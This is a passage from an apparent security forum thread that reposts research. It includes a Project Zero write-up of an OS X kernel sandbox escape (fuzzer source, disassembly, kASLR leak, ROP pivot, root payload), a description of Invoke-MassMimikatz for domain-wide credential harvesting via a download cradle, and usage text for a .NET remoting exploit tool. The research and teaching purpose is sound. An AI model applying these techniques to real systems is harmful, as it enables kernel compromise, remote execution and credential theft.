Mach Originally a research microkernel from CMU mach is responsible for many of the low-level idiosyncrasies of OS X. The mach IPC mechanism is one of the most fundamental parts of OS X but the mach kernel code is also responsible for things like virtual memory management. Mach only has a handful of dedicated mach syscalls (mach calls them traps) and almost all of these only exist to support the mach IPC system. All further interaction with the mach kernel subsystems from userspace is via mach IPC. IOKit IOKit is the framework used for writing device drivers on OS X. IOKit code is written in C++ which brings with it a whole host of new bug classes and exploitation possibilities. We'll return to a more detailed discussion of IOKit later. Mach IPC If you want to change the permissions of a memory mapping in your process, talk to a device driver, render a system font, symbolize a crash dump, debug another process or determine the current network connectivity status then on OS X behind the scenes you’re really sending and receiving mach messages. In order to find and exploit bugs in all those things it’s important to understand how mach IPC works: Messages, ports and queues Mach terminology can be a little unclear at times and OS X doesn’t ship with the man pages for the mach APIs (but you can view them online here.) Fundamentally mach IPC is message-oriented protocol. The messages sent via mach IPC are known as mach messages. Sending a mach message really means the message gets enqueued into a kernel-maintained message queue known as a mach port. Only one process can dequeue messages from a particular port. In mach terminology this process has a receive-right for the port. Multiple processes can enqueue messages to a port - these processes hold send-rights to that port. Within a process these send and receive rights are called mach port names. 
A mach port name is used to index a per-process mapping between mach port names and message queues (akin to how a process-local UNIX file descriptor maps to an actual file): In this diagram we can see that the process with PID 123 has a mach port name 0xabc. It’s important to notice that this Mach port name only has a meaning within this process - we can see that in the kernel structure for this process 0xabc is just a key which maps to a pointer to a message queue. When the process with PID 456 tries to dequeue a message using the mach port name 0xdef the kernel uses 0xdef to index that process’s map of mach ports such that it can find the correct message queue from which to dequeue a message. Mach messages A single mach message can have up to four parts: Message header - this header is mandatory and specifies the port name to send the message to as well as various flags. Kernel processed descriptors - this optional section can contain multiple descriptors which are parts of the message which need to be interpreted by the kernel. Inline data - this is the inline binary payload. Audit trailer - The message receiver can request that the kernel append an audit trailer to received messages. When a simple mach message containing no descriptors is sent it will first be copied entirely into a kernel heap-allocated buffer in the kernel. A pointer to that copy is then appended to the correct mach message queue and when the process with a receive right to that queue dequeues that message the kernel copy of the message gets copied into the receiving process. Out-of-line memory Copying large messages into and out of the kernel is slow, especially if the messages are large. In order to send large amounts of data you can use the “out-of-line memory” descriptor. This enables the message sender to instruct the kernel to make a copy-on-write virtual memory copy of a buffer in the receiver process when the message is dequeued. 
Bi-directional messages Mach IPC is fundamentally uni-directional. In order to build a two-way IPC mechanism mach IPC allows for messages to carry port rights. In a mach message, along with binary data you can also send a mach port right. Mach IPC is quite flexible when it comes to sending port rights to other processes. You can use the local_port field of the mach message header, use a port descriptor or use an OOL-ports descriptor. There are a multitude of flags to control exactly what rights should be transferred, or if new rights should be created during the send operation (it’s common to use the MAKE_SEND flag which creates and sends a new send right to a port which you hold the receive right for.) Bootstrapping Mach IPC There’s a fundamental bootstrapping problem with mach IPC: how do you get a send right to a port for which another process has a receive right without first sending them a message (thus encountering the same problem in reverse.) One way around this could be to allow mach ports to be inherited across a fork() akin to setting up a pipe between a parent and child process using socketpair(). However, unlike file descriptors, mach port rights are not inherited across a fork so you can’t implement such a system. Except, some mach ports are inherited across a fork! These are the special mach ports, one of which is the bootstrap port. The parent of all processes on OS X is launchd, and one of its roles is to set the default bootstrap port which will then be inherited by every child. Launchd Launchd holds the receive-right to this bootstrap port and plays the role of the bootstrap server, allowing processes to advertise named send-rights which other processes can look up. These are OS X Mach IPC services. MIG We’re now at the point where we can see how the kernel and userspace Mach IPC systems use a few hacks to get bootstrapped such that they’re able to send binary data. This is all that you get with raw Mach IPC. 
MIG is the Mach Interface Generator and it provides a simple RPC (remote procedure call) layer on top of the raw mach message IPC. MIG is used by all the Mach kernel services and many userspace services. MIG interfaces are declared in .defs files. These use a simple Interface Definition Language which can define function prototypes and simple data structures. The MIG tool compiles the .defs into C code which implements all the required argument serialization/deserialization. Calling a MIG RPC is completely transparent, it’s just like calling a regular C function and if you’ve ever programmed on a Mac you’ve almost certainly used a MIG generated header file. IOKit As mentioned earlier IOKit is the framework and kernel subsystem used for device drivers. All interactions with IOKit begin with the IOKit master port. This is another special mach port which allows access to the IOKit registry. devices.defs is the relevant MIG definition file. The Apple developer documentation describes the IOKit registry in great detail. The IOKit registry allows userspace programs to find out about available hardware. Furthermore, device drivers can expose an interface to userspace by implementing a UserClient. 
The main way which userspace actually interacts with an IOKit driver's UserClient is via the io_connect_method MIG RPC: [FONT=Courier New]type io_scalar_inband64_t = array[*:16] of uint64_t;[/FONT] [FONT=Courier New]type io_struct_inband_t = array[*:4096] of char;[/FONT] [FONT=Courier New]routine io_connect_method([/FONT] [FONT=Courier New] connection : io_connect_t;[/FONT] [FONT=Courier New] in selector : uint32_t;[/FONT] [FONT=Courier New] in scalar_input : io_scalar_inband64_t;[/FONT] [FONT=Courier New] in inband_input : io_struct_inband_t;[/FONT] [FONT=Courier New] in ool_input : mach_vm_address_t;[/FONT] [FONT=Courier New] in ool_input_size : mach_vm_size_t;[/FONT] [FONT=Courier New] out inband_output : io_struct_inband_t, CountInOut;[/FONT] [FONT=Courier New] out scalar_output : io_scalar_inband64_t, CountInOut;[/FONT] [FONT=Courier New] in ool_output : mach_vm_address_t;[/FONT] [FONT=Courier New] inout ool_output_size : mach_vm_size_t [/FONT] [FONT=Courier New]);[/FONT] This method is wrapped by the IOKitUser library function IOConnectCallMethod. 
The kernel implementation of this MIG API is in IOUserClient.cpp in the function [FONT=Courier New]is_io_connect_method[/FONT][FONT=Trebuchet MS]:[/FONT] [FONT=Courier New] kern_return_t is_io_connect_method[/FONT] [FONT=Courier New] ([/FONT] [FONT=Courier New] io_connect_t connection,[/FONT] [FONT=Courier New] uint32_t selector,[/FONT] [FONT=Courier New] io_scalar_inband64_t scalar_input,[/FONT] [FONT=Courier New] mach_msg_type_number_t scalar_inputCnt,[/FONT] [FONT=Courier New] io_struct_inband_t inband_input,[/FONT] [FONT=Courier New] mach_msg_type_number_t inband_inputCnt,[/FONT] [FONT=Courier New] mach_vm_address_t ool_input,[/FONT] [FONT=Courier New] mach_vm_size_t ool_input_size,[/FONT] [FONT=Courier New] io_struct_inband_t inband_output,[/FONT] [FONT=Courier New] mach_msg_type_number_t *inband_outputCnt,[/FONT] [FONT=Courier New] io_scalar_inband64_t scalar_output,[/FONT] [FONT=Courier New] mach_msg_type_number_t *scalar_outputCnt,[/FONT] [FONT=Courier New] mach_vm_address_t ool_output,[/FONT] [FONT=Courier New] mach_vm_size_t *ool_output_size[/FONT] [FONT=Courier New] )[/FONT] [FONT=Courier New] {[/FONT] [FONT=Courier New] CHECK( IOUserClient, connection, client );[/FONT] [FONT=Courier New] IOExternalMethodArguments args;[/FONT] [FONT=Courier New]... 
[/FONT] [FONT=Courier New] args.selector = selector;[/FONT] [FONT=Courier New] args.scalarInput = scalar_input;[/FONT] [FONT=Courier New] args.scalarInputCount = scalar_inputCnt;[/FONT] [FONT=Courier New] args.structureInput = inband_input;[/FONT] [FONT=Courier New] args.structureInputSize = inband_inputCnt;[/FONT] [FONT=Courier New]...[/FONT] [FONT=Courier New] args.scalarOutput = scalar_output;[/FONT] [FONT=Courier New] args.scalarOutputCount = *scalar_outputCnt;[/FONT] [FONT=Courier New] args.structureOutput = inband_output;[/FONT] [FONT=Courier New] args.structureOutputSize = *inband_outputCnt; [/FONT] [FONT=Courier New]...[/FONT] [FONT=Courier New] ret = client->externalMethod( selector, &args );[/FONT] Here we can see that the code fills in an IOExternalMethodArguments structure from the arguments passed to the MIG RPC and then calls the ::externalMethod method of the IOUserClient. What happens next depends on the structure of the driver’s IOUserClient subclass. If the driver overrides externalMethod then this calls straight into driver code. Typically the selector argument to IOConnectCallMethod would be used to determine what function to call, but if the subclass overrides externalMethod it’s free to implement whatever method dispatch mechanism it wants. 
However if the driver subclass doesn’t override externalMethod the IOUserClient implementation of it will call getTargetAndMethodForIndex passing the selector argument - this is the method which most IOUserClient subclasses override - it returns a pointer to an IOExternalMethod structure: [FONT=Courier New]struct IOExternalMethod {[/FONT] [FONT=Courier New] IOService * object;[/FONT] [FONT=Courier New] IOMethod func;[/FONT] [FONT=Courier New] IOOptionBits flags;[/FONT] [FONT=Courier New] IOByteCount count0;[/FONT] [FONT=Courier New] IOByteCount count1;[/FONT] [FONT=Courier New]};[/FONT] Most drivers have a simple implementation of getTargetAndMethodForIndex which uses the selector argument to index an array of IOExternalMethod structures. This structure contains a pointer to the method to be invoked (and since this is C++ this isn’t actually a function pointer but a pointer-to-member-method which means things can get very fun when you get to control it! See the bug report for CVE-2014-1379 in the Project Zero bugtracker for an example of this.) The flags member is used to define what mixture of input and output types the ExternalMethod supports and the count0 and count1 fields define the number or size in bytes of the input and output arguments. There are various shim functions which make sure that func is called with the correct prototype depending on the declared number and type of arguments. Putting all that together At this point we know that when we call IOConnectCallMethod what really happens is that C code auto-generated by MIG serializes all the arguments into a data buffer which is wrapped in a mach message which is sent to a mach port we received from the IOKit registry which we knew how to talk to because every process has a special device port. That message gets copied into the kernel where more MIG generated C code deserializes it and calls is_io_connect_method which calls the driver’s externalMethod virtual method. 
Writing an IOKit fuzzer When auditing code alongside manual analysis it’s often worth writing a fuzzer. As soon as you’ve understood where attacker-controlled data could enter a system you can write a simple piece of code to throw randomness at it. As your knowledge of the code improves you can make incremental improvements to the fuzzer, allowing it to explore the code more deeply. IOConnectCallMethod is the perfect example of an API where this applies. It’s very easy to write a simple fuzzer to make random IOConnectCallMethod calls. One approach to slightly improve on just using randomness is to try to mutate real data. In this case, we want to mutate valid arguments to IOConnectCallMethod. Check out this talk from Chen Xiaobo and Xu Hao about how to do exactly that. DYLD interposing dyld is the OS X dynamic linker. Similar to using LD_PRELOAD on linux dyld supports dynamic link time interposition of functions. This means we can intercept function calls between different libraries and inspect and modify arguments. 
Here’s the complete IOConnectCallMethod fuzzer interpose library I wrote for pwn4fun: [FONT=Courier New]#include <stdint.h>[/FONT] [FONT=Courier New]#include <stdio.h>[/FONT] [FONT=Courier New]#include <stdlib.h>[/FONT] [FONT=Courier New]#include <time.h>[/FONT] [FONT=Courier New]#include <IOKit/IOKitLib.h>[/FONT] [FONT=Courier New]int maybe(){[/FONT] [FONT=Courier New] static int seeded = 0;[/FONT] [FONT=Courier New] if(!seeded){[/FONT] [FONT=Courier New] srand(time(NULL));[/FONT] [FONT=Courier New] seeded = 1;[/FONT] [FONT=Courier New] }[/FONT] [FONT=Courier New] return !(rand() % 100);[/FONT] [FONT=Courier New]}[/FONT] [FONT=Courier New]void flip_bit(void* buf, size_t len){[/FONT] [FONT=Courier New] if (!len)[/FONT] [FONT=Courier New] return;[/FONT] [FONT=Courier New] size_t offset = rand() % len;[/FONT] [FONT=Courier New] ((uint8_t*)buf)[offset] ^= (0x01 << (rand() % 8));[/FONT] [FONT=Courier New]}[/FONT] [FONT=Courier New]kern_return_t[/FONT] [FONT=Courier New]fake_IOConnectCallMethod([/FONT] [FONT=Courier New] mach_port_t connection,[/FONT] [FONT=Courier New] uint32_t selector,[/FONT] [FONT=Courier New] uint64_t *input,[/FONT] [FONT=Courier New] uint32_t inputCnt,[/FONT] [FONT=Courier New] void *inputStruct,[/FONT] [FONT=Courier New] size_t inputStructCnt,[/FONT] [FONT=Courier New] uint64_t *output,[/FONT] [FONT=Courier New] uint32_t *outputCnt,[/FONT] [FONT=Courier New] void *outputStruct,[/FONT] [FONT=Courier New] size_t *outputStructCntP)[/FONT] [FONT=Courier New]{[/FONT] [FONT=Courier New] if (maybe()){[/FONT] [FONT=Courier New] flip_bit(input, sizeof(*input) * inputCnt);[/FONT] [FONT=Courier New] }[/FONT] [FONT=Courier New] if (maybe()){[/FONT] [FONT=Courier New] flip_bit(inputStruct, inputStructCnt);[/FONT] [FONT=Courier New] }[/FONT] [FONT=Courier New] return IOConnectCallMethod([/FONT] [FONT=Courier New] connection,[/FONT] [FONT=Courier New] selector,[/FONT] [FONT=Courier New] input,[/FONT] [FONT=Courier New] inputCnt,[/FONT] [FONT=Courier New] 
inputStruct,[/FONT] [FONT=Courier New] inputStructCnt,[/FONT] [FONT=Courier New] output,[/FONT] [FONT=Courier New] outputCnt,[/FONT] [FONT=Courier New] outputStruct,[/FONT] [FONT=Courier New] outputStructCntP);[/FONT] [FONT=Courier New]}[/FONT] [FONT=Courier New]typedef struct interposer {[/FONT] [FONT=Courier New] void* replacement;[/FONT] [FONT=Courier New] void* original;[/FONT] [FONT=Courier New]} interpose_t;[/FONT] [FONT=Courier New]__attribute__((used)) static const interpose_t interposers[][/FONT] [FONT=Courier New] __attribute__((section("__DATA, __interpose"))) =[/FONT] [FONT=Courier New] {[/FONT] [FONT=Courier New] { .replacement = (void*)fake_IOConnectCallMethod,[/FONT] [FONT=Courier New] .original = (void*)IOConnectCallMethod[/FONT] [FONT=Courier New] } [/FONT] [FONT=Courier New] };[/FONT] Compile that as a dynamic library: $ clang -Wall -dynamiclib -o flip.dylib flip.c -framework IOKit -arch i386 -arch x86_64 and load it: $ DYLD_INSERT_LIBRARIES=./flip.dylib hello_world 1% of the time this will flip one bit in any struct input and scalar input to an IOKit external method. This was the fuzzer which found the bug used to get kernel instruction pointer control for pwn4fun, and it found it well before I had any clue how the Intel GPU driver worked at all. 
IntelAccelerator bug Running the fuzzer shown above with any program using the GPU led within seconds to a crash in the following method in the AppleIntelHD4000Graphics kernel extension at the instruction at offset 0x8BAF: [FONT=Courier New]IGAccelGLContext::unmap_user_memory( ;rdi == this[/FONT] [FONT=Courier New] IntelGLUnmapUserMemoryIn *, ;rsi[/FONT] [FONT=Courier New] unsigned long long) ;rdx[/FONT] [FONT=Courier New]__text:8AD6[/FONT] [FONT=Courier New]__text:8AD6 var_30 = qword ptr -30h[/FONT] [FONT=Courier New]...[/FONT] [FONT=Courier New]__text:8AED cmp rdx, 8[/FONT] [FONT=Courier New]__text:8AF1 jnz loc_8BFB[/FONT] [FONT=Courier New]__text:8AF7 mov rbx, [rsi] ;rsi points to controlled data[/FONT] [FONT=Courier New]__text:8AFA mov [rbp+var_30], rbx ;rbx completely controlled[/FONT] [FONT=Courier New]...[/FONT] [FONT=Courier New]__text:8BAB mov rbx, [rbp+var_30][/FONT] [FONT=Courier New]__text:8BAF mov rax, [rbx] ;crash[/FONT] [FONT=Courier New]__text:8BB2 mov rdi, rbx[/FONT] [FONT=Courier New]__text:8BB5 call qword ptr [rax+140h][/FONT] Looking at the cross references to this function in IDA Pro we can see that unmap_user_memory is selector 0x201 of the IGAccelGLContext user client. This external method has one struct input so on entry to this function rsi points to controlled data (and rdx contains the length of that struct input in bytes.) At address 0x8af7 this function reads the first 8 bytes of the struct input as a qword and saves them in rbx. At this point rbx is completely controlled. This controlled value is then saved into the local variable var_30. Later at 0x8bab this value is read back into rbx, then at 0x8baf that controlled value is dereferenced without any checks leading to a crash. If that dereference doesn't crash however, then the qword value at offset 0x140 from the read value will be called. 
In other words, this external method is treating the struct input bytes as containing a pointer to a C++ object and it’s calling a virtual method of that object without checking whether the pointer is valid. Kernel space is just trusting that userspace will only ever pass a valid kernel object pointer. So by crafting a fake IOKit object and passing a pointer to it as the struct input of selector 0x201 of IGAccelGLContext we can get kernel instruction pointer control! Now what? SMEP/SMAP SMEP and SMAP are two CPU features designed to make exploitation of this type of bug trickier. Mavericks supports Supervisor Mode Execute Prevention which means that when the processor is executing kernel code the cpu will fault if it tries to execute code on pages belonging to userspace. This prevents us from simply mapping an executable kernel shellcode payload at a known address in userspace and getting the kernel to jump to it. The generic defeat for this mitigation is code-reuse (ROP). Rather than diverting execution directly to shellcode in userspace instead we have to divert it to existing executable code in the kernel. By “pivoting” the stack pointer to controlled data we can easily chain together multiple code chunks and either turn off SMEP or execute an entire payload just in ROP. The second generic mitigation supported at the CPU level is Supervisor Mode Access Prevention. As the name suggests this prevents kernel code from even reading user pages directly. This would mean we’d have to be able to get controlled data at a known location in kernel space for the fake IOKit object and the ROP stack since we wouldn’t be able to dereference userspace addresses, even to read them. However, Mavericks doesn’t support SMAP so this isn’t a problem, we can put the fake IOKit object, vtable and ROP stack in userspace. kASLR To write the ROP stack we need to know the exact location of the kernel code we’re planning to reuse. 
On OS X kernel address space layout randomisation means that there are 256 different addresses where the kernel code could be located, one of which is randomly chosen at boot time. Therefore to find the addresses of the executable code chunks we need some way to determine the distance kASLR has shifted the code in memory (this value is known as the kASLR slide.) IOKit registry We briefly mentioned earlier that the IOKit registry allows userspace programs to find out about hardware, but what does that actually mean? The IOKit registry is really just a place where drivers can publish (key:value) pairs (where the key is a string and the value something equivalent to a CoreFoundation data type.) The drivers can also specify that some of these keys are configurable which means userspace can use the IOKit registry API to set new values. Here are the MIG RPCs for reading and settings IOKit registry values: [FONT=Courier New]routine io_registry_entry_get_property([/FONT] [FONT=Courier New] registry_entry : io_object_t;[/FONT] [FONT=Courier New] in property_name : io_name_t;[/FONT] [FONT=Courier New] out properties : io_buf_ptr_t, physicalcopy );[/FONT] [FONT=Courier New]routine io_registry_entry_set_properties([/FONT] [FONT=Courier New] registry_entry : io_object_t;[/FONT] [FONT=Courier New] in properties : io_buf_ptr_t, physicalcopy;[/FONT] [FONT=Courier New] out result : kern_return_t );[/FONT] And here are the important parts of the kernel-side implementation of those functions, firstly, for setting a property: [FONT=Courier New]kern_return_t is_io_registry_entry_set_properties( [/FONT] [FONT=Courier New] io_object_t registry_entry,[/FONT] [FONT=Courier New] io_buf_ptr_t properties,[/FONT] [FONT=Courier New] mach_msg_type_number_t propertiesCnt,[/FONT] [FONT=Courier New] kern_return_t * result){[/FONT] [FONT=Courier New] ... 
[/FONT] [FONT=Courier New] obj = OSUnserializeXML( (const char *) data, propertiesCnt );[/FONT] [FONT=Courier New] ...[/FONT] [FONT=Courier New]#if CONFIG_MACF[/FONT] [FONT=Courier New] else if (0 != mac_iokit_check_set_properties(kauth_cred_get(),[/FONT] [FONT=Courier New] registry_entry,[/FONT] [FONT=Courier New] obj))[/FONT] [FONT=Courier New] res = kIOReturnNotPermitted;[/FONT] [FONT=Courier New]#endif[/FONT] [FONT=Courier New] else[/FONT] [FONT=Courier New]res = entry->setProperties( obj );[/FONT] [FONT=Courier New] ...[/FONT] and secondly, for reading a property: [FONT=Courier New]kern_return_t is_io_registry_entry_get_property([/FONT] [FONT=Courier New] io_object_t registry_entry,[/FONT] [FONT=Courier New] io_name_t property_name,[/FONT] [FONT=Courier New] io_buf_ptr_t *properties,[/FONT] [FONT=Courier New] mach_msg_type_number_t *propertiesCnt ){[/FONT] [FONT=Courier New] ...[/FONT] [FONT=Courier New]obj = entry->copyProperty(property_name);[/FONT] [FONT=Courier New] if( !obj)[/FONT] [FONT=Courier New] return( kIOReturnNotFound );[/FONT] [FONT=Courier New] OSSerialize * s = OSSerialize::withCapacity(4096);[/FONT] [FONT=Courier New] ...[/FONT] [FONT=Courier New] if( obj->serialize( s )) {[/FONT] [FONT=Courier New] len = s->getLength();[/FONT] [FONT=Courier New] *propertiesCnt = len;[/FONT] [FONT=Courier New]err = copyoutkdata( s->text(), len, properties );[/FONT] [FONT=Courier New] ...[/FONT] These functions are pretty simple wrappers around the setProperties and copyProperty functions implemented by the drivers themselves. There’s one very important thing to pick up on here though: in the is_io_registry_entry_set_properties function there’s a MAC hook, highlighted here in red, which allows sandbox profiles to restrict the ability to set IOKit registry values. (This hook is exposed by Sandbox.kext as the iokit-set-properties operation.) Contrasts this with the is_io_registry_entry_get_property function which has no MAC hook. 
This means that read access to the IOKit registry cannot be restricted. Every OS X process has full access to read every single (key:value) pair exposed by every IOKit driver. Enumerating the iokit registry OS X ships with the ioreg tool for exploring the IOKit registry on the command line. By passing the -l flag we can get ioreg to enumerate all the registry keys and dump their values. Since we’re looking for kernel pointers, let's grep the output looking for a byte pattern we’d expect to see in a kernel pointer: $ ioreg -l | grep 80ffffff | "IOPlatformArgs" =<00901d2880ffffff00c01c2880ffffff90fb222880ffffff0000000000000000> That looks an awful lot like a hexdump of some kernel pointers Looking for the "IOPlatformArgs" string in the XNU source code we can see that the first of these pointers is actually the address of the DeviceTree that’s passed to the kernel at boot. And it just so happens that the same kASLR slide that gets applied to the kernel image also gets applied to that DeviceTree pointer, meaning that we can simply subtract a constant from this leaked pointer to determine the runtime load address of the kernel allowing us to rebase our ROP stack. Check out this blog post from winocm for a lot more insight into this bug and its applicability to iOS. OS X kernel ROP pivot Looking at the disassembly of unmap_user_memory we can see that when the controlled virtual method is called the rax register points to the fake vtable which we've put in userspace. The pointer at offset 0x140h will be the function pointer that gets called which makes the vtable a convenient place for the ROP stack. We just need to find a sequence of instructions which will move the value of rax into rsp. 
The /mach_kernel binary has following instruction sequence: push rax[/FONT] [FONT=Courier New] add [rax], eax[/FONT] [FONT=Courier New] add [rbx+0x41], bl[/FONT] [FONT=Courier New] pop rsp[/FONT] [FONT=Courier New] pop r14[/FONT] [FONT=Courier New] pop r15[/FONT] [FONT=Courier New] pop rbp[/FONT] [FONT=Courier New] ret[/FONT] This will push the vtable address on to the stack, corrupt the first entry in the vtable and write a byte to rbx+0x41. rbx will be the this pointer of the fake IOKit object which we control and have pointed into userspace so neither of these writes will crash. pop rsp then pops the top of the stack into rsp - since we just pushed rax on to the stack this means that rsp now points to the fake vtable in userspace. The code then pops values for r14, r15 and rbp then returns meaning that we can place a full ROP stack in the fake vtable of the fake IOKit object. Payload and continuation The OS X kernel function KUNCExecute is a really easy way to launch GUI applications from kernel code: kern_return_t KUNCExecute(char executionPath[1024], int uid, int gid) The payload for the pwn4fun exploit was a ROP stack which called this, passing a pointer to the string “/Applications/Calculator.app/Contents/MacOS/Calculator” as the executionPath and 0 and 0 as the uid and gid parameters. This launches the OS X calculator as root Take a look at this exploit for this other IOKit bug which takes a slightly different approach by using a handful of ROP gadgets to first disable SMEP then call a more complicated shellcode payload in userspace. And if you're still running OS X Mavericks or below then why not try it out? After executing the kernel payload we can call the kernel function thread_exception_return to return back to usermode. If we just do this however it will appear as if the whole system has frozen. The kernel payload has actually run (and we can verify this by attaching a kernel debugger) but we can no longer interact with the system. 
This is because before we got kernel code execution unmap_user_memory took two locks - if we don’t drop those locks then no other functions will be able to get them and the GPU driver grinds to a halt. Again, check out that linked exploit above to see some example shellcode which drops the locks. Conclusion The actual development process of this sandbox escape was nothing like as linear as this writeup made it seem. There were many missed turns and other bugs which looked like far too much effort to exploit. Naturally these were reported to Apple too, just in case. A few months after the conclusion of pwn4fun 2014 I decided to take another look at GPU drivers on OS X, this time focusing on manual analysis. Take a look at the following bug reports for PoC code and details of all the individual bugs: CVE-2014-1372,CVE-2014-1373, CVE-2014-1376, CVE-2014-1377, CVE-2014-1379, CVE-2014-4394, CVE-2014-4395, CVE-2014-4398, CVE-2014-4401, CVE-2014-4396, CVE-2014-4397, CVE-2014-4400, CVE-2014-4399, CVE-2014-4416, CVE-2014-4376, CVE-2014-4402 Finally, why not subscribe to the Project Zero bug tracker and follow along with all our latest research? Surds: Project Zero: pwn4fun Spring 2014 - Safari - Part II
  5. Dumping a Domain’s Worth of Passwords With Mimikatz pt. 2 November 24, 2014 by harmj0y [Note: this topic was cross-posted on the official Veris Group blog] A year ago, @mubix published a cool post on Carnal0wnage & Attack Research Blog about “Dumping a domain’s worth of passwords with mimikatz“. In the article, he talked about using a combination of PowerShell, file shares, .bat scripts and output files in order to run Mimikatz across a large number of machines in an enterprise using just WMI. A few months ago, @obscuresec posted a great article on using PowerShell as a quick and dirty web server. I started thinking about how to incorporate Chris’ work with Rob’s approach to simplify the attack flow a bit. The result is Invoke-MassMimikatz, a PowerShell script that utilizes @clymb3r’s work with reflective .dll injection/Mimikatz, along with @obscuresec’s webserver and WMI functionality to deliver Mimikatz functionality en-mass to machines on a domain. Again, this doesn’t rely on PSRemoting, and doesn’t need any external binaries, though it does need local admin. It’s just pure PowerShell, WMI, and HTTP goodness. Here’s how Invoke-MassMimikatz works: A jobbified web server is spun up in the background. This server will share out the Invoke-Mimikatz code for GET requests, and decodes POST responses with results from targets. It defaults to port 8080, which can be changed with the -LocalPort flag. A PowerShell one-liner is built that uses the IEX download cradle to grab/execute code from the server, encode the results in Base64, and then post the results back to the same server. The command is executed on all specified hosts using WMI. As the raw results come back in clients, the raw output is saved to a specified folder, under “HOSTNAME.txt”. This folder defaults to “MimikatzOutput”, which can be changed with the -OutputFolder flag. Some parsing code tries to aggregate the result sets and build custom psobjects of credential sets. 
In practice, this is how it looks: End result? You get some nice “server”/”credential” results pouring back in, which can be piped to CSVs or whatever you would like. Let me know if anyone uses this script and finds it useful! Sursa: Dumping a Domain’s Worth of Passwords With Mimikatz pt. 2 – harmj0y
  6. ExploitRemotingService © 2014 James Forshaw A tool to exploit .NET Remoting Services vulnerable to CVE-2014-1806 or CVE-2014-4149. It only works on Windows although some aspects might work in Mono on *nix. Usage Instructions: ExploitRemotingService [options] uri command [command args] Copyright © James Forshaw 2014 Uri: The supported URI are as follows: tcp://host:port/ObjName - TCP connection on host and portname ipc://channel/ObjName - Named pipe channel Options: -s, --secure Enable secure mode -p, --port=VALUE Specify the local TCP port to listen on -i, --ipc=VALUE Specify listening pipe name for IPC channel --user=VALUE Specify username for secure mode --pass=VALUE Specify password for secure mode --ver=VALUE Specify version number for remote, 2 or 4 --usecom Use DCOM backchannel instead of .NET remoting --remname=VALUE Specify the remote object name to register -v, --verbose Enable verbose debug output --useser Uses old serialization tricks, only works on full type filter services -h, -?, --help Commands: exec [-wait] program [cmdline]: Execute a process on the hosting server cmd cmdline : Execute a command line process and display stdout put localfile remotefile : Upload a file to the hosting server get remotefile localfile : Download a file from the hosting server ls remotedir : List a remote directory run file [args] : Upload and execute an assembly, calls entry point user : Print the current username ver : Print the OS version This tool supports exploit both TCP remoting services and local IPC services. To test the exploit you need to know the name of the .NET remoting service and the port it's listening on (for TCP) or the name of the Named Pipe (for IPC). You can normally find this in the server or client code. Look for things like calls to: RemotingConfiguration.RegisterWellKnownServiceType or Activator.CreateInstance You can then try the exploit by constructing an appropriate URL. If TCP you can use the URL format tcp://hostname:port/ServiceName. 
For IPC use ipc://NamedPipeName/ServiceName. A simple test is to do: ExploitRemotingService SERVICEURL ver If successful it should print the OS version of the hosting .NET remoting service. If you get an exception it might be fixed with CVE-2014-1806. At this point try the COM version using: ExploitRemotingService -usecom SERVICEURL ver This works best locally but can work remotely if you modify the COM configuration and disable the firewall you should be able to get it to work. If that still doesn't work then it might be an up to date server. Instead you can also try the full serialization version using. ExploitRemotingService -useser SERVICEURL ls c:\ For this to work the remoting service must be running with full typefilter mode enabled (which is some, especially IPC services). It also only works with the commands ls, put and get. But that should be enough to compromise a box. I've provided an example service to test against. Sursa: https://github.com/tyranid/ExploitRemotingService
  7. Stupid is as Stupid Does When It Comes to .NET Remoting Finding vulnerabilities in .NET is something I quite enjoy, it generally meets my criteria of only looking for logic bugs. Probably the first research I did was into .NET serialization where I got some interesting results, and my first Blackhat USA presentation slot. One of the places where you could abuse serialization was in .NET remoting, which is a technology similar to Java RMI or CORBA to access .NET objects remotely (or on the same machine using IPC). Microsoft consider it a legacy technology and you shouldn't use it, but that won't stop people. One day I came to the realisation that while I'd talked about how dangerous it was I'd never released any public PoC for exploiting it. So I decided to start writing a simple tool to exploit vulnerable servers, that was my first mistake. As I wanted to fully understand remoting to write the best tool possible I decided to open my copy of Reflector, that was my second mistake. I then looked at the code, sadly that was my last mistake. TL;DR you can just grab the tool and play. If you want a few of the sordid details of CVE-2014-1806 and CVE-2014-4149 then read on. .NET Remoting Overview Before I can describe what the bug is I need to describe how .NET remoting works a little bit. Remoting was built into the .NET framework from the very beginning. It supports a pluggable architecture where you can replace many of the pieces, but I'm just going to concentrate on the basic implementation and what's important from the perspective of the bug. MSDN has plenty of resources which go into a bit more depth and there's always the official documentation MS-NRTP and MS-NRBF. A good description is available here. The basics of .NET remoting is you have a server class which is derived from the MarshalByRefObject class. This indicates to the .NET framework that this object can be called remotely. 
The server code can publish this server object using the remoting APIs such as RemotingConfiguration.RegisterWellKnownServiceType. On the client side a call can be made to APIs such as Activator.GetObject which will establish a transparent proxy for the Client. When the Client makes a call on this proxy the method information and parameters are packaged up into an object which implements the IMethodCallMessage interface. This object is sent to the server which processes the message, calls the real method and returns the return value (or exception) inside an object which implements the IMethodReturnMessage interface. When a remoting session is constructed we need to create a couple of Channels, a Client Channel for the client and a Server Channel for the server. Each channel contains a number of pluggable components called sinks. A simple example is shown below: The transport sinks are unimportant for the vulnerability. These sinks are used to actually transport the data in some form, for example as binary over TCP. The important things to concentrate on from the perspective of the vulnerabilities are the Formatter Sinks and the StackBuilder Sink. Formatter Sinks take the IMethodCallMessage or IMethodReturnMessage objects and format their contents so that it can be sent across the transport. It's also responsible for unpacking the result at the other side. As the operations are asymmetric from the channel perspective there are two different formatter sinks, IClientChannelSink and IServerChannelSink. While you can select your own formatter sink the framework will almost always give you a formatter based on the BinaryFormatter object which as we know can be pretty dangerous due to the potential for deserialization bugs. The client sink is implemented in BinaryClientFormatterSink and the server sink is BinaryServerFormatterSink. The StackBuilder sink is an internal only class implemented by the framework for the server. 
